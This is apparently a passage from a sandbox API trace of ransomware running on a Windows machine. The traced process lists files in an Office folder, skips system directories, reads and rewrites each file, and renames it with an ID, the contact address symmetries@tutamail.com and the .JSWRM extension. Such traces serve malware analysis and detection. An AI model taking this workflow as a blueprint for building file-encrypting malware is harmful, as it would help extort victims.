hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0115.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0115.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0115.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0115.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0115.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0115.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0115.307] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OCCMPVRD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\occmpvrd.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OCCMPVRD.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\occmpvrd.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0115.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0115.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0115.308] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1b81e2e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1b81e2e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1b81e2e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2ca8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="OcHelperResource.dll", cAlternateFileName="OCHELP~1.DLL")) returned 1 [0115.308] lstrcmpiW (lpString1="OcHelperResource.dll", lpString2=".") returned 1 [0115.308] lstrcmpiW (lpString1="OcHelperResource.dll", lpString2="..") returned 1 [0115.308] lstrcmpiW (lpString1="OcHelperResource.dll", lpString2="...") returned 1 [0115.308] lstrcmpiW (lpString1="OcHelperResource.dll", lpString2="windows") returned -1 [0115.308] lstrcmpiW (lpString1="OcHelperResource.dll", lpString2="recovery") returned -1 [0115.308] lstrcmpiW (lpString1="OcHelperResource.dll", lpString2="perflogs") returned -1 [0115.308] lstrcmpiW (lpString1="OcHelperResource.dll", lpString2="documents and settings") returned 1 [0115.308] lstrcmpiW (lpString1="OcHelperResource.dll", lpString2="$RECYCLE.BIN") returned 1 [0115.308] lstrcmpiW (lpString1="OcHelperResource.dll", lpString2="system volume information") returned -1 [0115.308] lstrcmpiW (lpString1="OcHelperResource.dll", lpString2="msocache") returned 1 [0115.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0115.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OcHelperResource.dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0115.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0115.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OcHelperResource.dll", cchWideChar=20, lpMultiByteStr=0x2411c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OcHelperResource.dll", lpUsedDefaultChar=0x0) returned 20 [0115.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0115.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0115.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OcHelperResource.dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0115.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0115.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OcHelperResource.dll", cchWideChar=20, lpMultiByteStr=0x240f20, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OcHelperResource.dll", lpUsedDefaultChar=0x0) returned 20 [0115.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0115.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0115.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0115.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0115.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0115.308] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x46b2075, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x46b2075, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x46b2075, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x42c, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="OCMODVRD.XML", cAlternateFileName="")) returned 1 [0115.308] lstrcmpiW (lpString1="OCMODVRD.XML", lpString2=".") returned 1 [0115.308] lstrcmpiW (lpString1="OCMODVRD.XML", lpString2="..") returned 1 [0115.308] lstrcmpiW (lpString1="OCMODVRD.XML", lpString2="...") returned 1 [0115.308] lstrcmpiW (lpString1="OCMODVRD.XML", lpString2="windows") returned -1 [0115.308] lstrcmpiW (lpString1="OCMODVRD.XML", lpString2="recovery") returned -1 [0115.309] lstrcmpiW (lpString1="OCMODVRD.XML", lpString2="perflogs") returned -1 [0115.309] lstrcmpiW (lpString1="OCMODVRD.XML", lpString2="documents and settings") returned 1 [0115.309] lstrcmpiW (lpString1="OCMODVRD.XML", lpString2="$RECYCLE.BIN") returned 1 [0115.309] lstrcmpiW (lpString1="OCMODVRD.XML", lpString2="system volume information") returned -1 [0115.309] lstrcmpiW (lpString1="OCMODVRD.XML", lpString2="msocache") returned 1 [0115.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0115.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCMODVRD.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCMODVRD.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OCMODVRD.XML", lpUsedDefaultChar=0x0) returned 12 [0115.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0115.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0115.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCMODVRD.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCMODVRD.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OCMODVRD.XML", lpUsedDefaultChar=0x0) returned 12 [0115.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0115.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0115.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0115.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0115.309] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OCMODVRD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\ocmodvrd.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.310] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1068) returned 1 [0115.310] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x420) returned 0x230a00 [0115.310] ReadFile (in: hFile=0x238, lpBuffer=0x230a00, nNumberOfBytesToRead=0x420, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x420, lpOverlapped=0x0) returned 1 [0115.311] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.311] WriteFile (in: hFile=0x238, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x420, lpOverlapped=0x0) returned 1 [0115.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0115.311] CloseHandle (hObject=0x238) returned 1 [0115.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0115.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0115.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0115.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0115.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0115.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0115.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0115.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0115.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0115.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0115.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0115.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0115.312] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OCMODVRD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\ocmodvrd.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OCMODVRD.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\ocmodvrd.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0115.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0115.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0115.313] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ae94c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9c1bf71, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16f0a8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="OcPubRes.dll", cAlternateFileName="")) returned 1 [0115.313] lstrcmpiW (lpString1="OcPubRes.dll", lpString2=".") returned 1 [0115.313] lstrcmpiW (lpString1="OcPubRes.dll", lpString2="..") returned 1 [0115.313] lstrcmpiW (lpString1="OcPubRes.dll", lpString2="...") returned 1 [0115.313] lstrcmpiW (lpString1="OcPubRes.dll", lpString2="windows") returned -1 [0115.313] lstrcmpiW (lpString1="OcPubRes.dll", lpString2="recovery") returned -1 [0115.313] lstrcmpiW (lpString1="OcPubRes.dll", lpString2="perflogs") returned -1 [0115.313] lstrcmpiW (lpString1="OcPubRes.dll", lpString2="documents and settings") returned 1 [0115.313] lstrcmpiW (lpString1="OcPubRes.dll", lpString2="$RECYCLE.BIN") returned 1 [0115.313] lstrcmpiW (lpString1="OcPubRes.dll", lpString2="system volume information") returned -1 [0115.313] lstrcmpiW (lpString1="OcPubRes.dll", lpString2="msocache") returned 1 [0115.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0115.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OcPubRes.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OcPubRes.dll", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OcPubRes.dll", lpUsedDefaultChar=0x0) returned 12 [0115.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0115.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0115.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OcPubRes.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OcPubRes.dll", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OcPubRes.dll", lpUsedDefaultChar=0x0) returned 12 [0115.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0115.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0115.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0115.313] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9bcfaf5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9bcfaf5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9bcfaf5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd3e, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="officeinventoryagentfallback.xml", cAlternateFileName="OFFICE~2.XML")) returned 1 [0115.313] lstrcmpiW (lpString1="officeinventoryagentfallback.xml", lpString2=".") returned 1 [0115.313] lstrcmpiW (lpString1="officeinventoryagentfallback.xml", lpString2="..") returned 1 [0115.313] lstrcmpiW (lpString1="officeinventoryagentfallback.xml", lpString2="...") returned 1 [0115.313] lstrcmpiW (lpString1="officeinventoryagentfallback.xml", lpString2="windows") returned -1 [0115.313] lstrcmpiW (lpString1="officeinventoryagentfallback.xml", lpString2="recovery") returned -1 [0115.313] lstrcmpiW (lpString1="officeinventoryagentfallback.xml", lpString2="perflogs") returned -1 [0115.313] lstrcmpiW (lpString1="officeinventoryagentfallback.xml", lpString2="documents and settings") returned 1 [0115.313] lstrcmpiW (lpString1="officeinventoryagentfallback.xml", lpString2="$RECYCLE.BIN") returned 1 [0115.313] lstrcmpiW (lpString1="officeinventoryagentfallback.xml", lpString2="system volume information") returned -1 [0115.314] lstrcmpiW (lpString1="officeinventoryagentfallback.xml", lpString2="msocache") returned 1 [0115.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0115.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officeinventoryagentfallback.xml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0115.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0115.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officeinventoryagentfallback.xml", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="officeinventoryagentfallback.xml", lpUsedDefaultChar=0x0) returned 32 [0115.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0115.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0115.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officeinventoryagentfallback.xml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0115.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0115.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officeinventoryagentfallback.xml", cchWideChar=32, lpMultiByteStr=0x22d298, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="officeinventoryagentfallback.xml", lpUsedDefaultChar=0x0) returned 32 [0115.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0115.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0115.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0115.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0115.314] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\officeinventoryagentfallback.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\officeinventoryagentfallback.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.402] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3390) returned 1 [0115.402] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd30) returned 0x206858 [0115.402] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xd30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xd30, lpOverlapped=0x0) returned 1 [0115.404] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.404] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xd30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xd30, lpOverlapped=0x0) returned 1 [0115.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0115.404] CloseHandle (hObject=0x238) returned 1 [0115.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0115.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0115.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0115.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0115.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0115.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0115.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0115.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0115.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0115.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0115.405] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\officeinventoryagentfallback.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\officeinventoryagentfallback.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\officeinventoryagentfallback.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\officeinventoryagentfallback.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0115.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0115.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0115.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0115.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0115.406] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9ba9874, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9ba9874, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9bcfaf5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcf6, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="officeinventoryagentlogon.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0115.406] lstrcmpiW (lpString1="officeinventoryagentlogon.xml", lpString2=".") returned 1 [0115.406] lstrcmpiW (lpString1="officeinventoryagentlogon.xml", lpString2="..") returned 1 [0115.406] lstrcmpiW (lpString1="officeinventoryagentlogon.xml", lpString2="...") returned 1 [0115.406] lstrcmpiW (lpString1="officeinventoryagentlogon.xml", lpString2="windows") returned -1 [0115.406] lstrcmpiW (lpString1="officeinventoryagentlogon.xml", lpString2="recovery") returned -1 [0115.406] lstrcmpiW (lpString1="officeinventoryagentlogon.xml", lpString2="perflogs") returned -1 [0115.406] lstrcmpiW 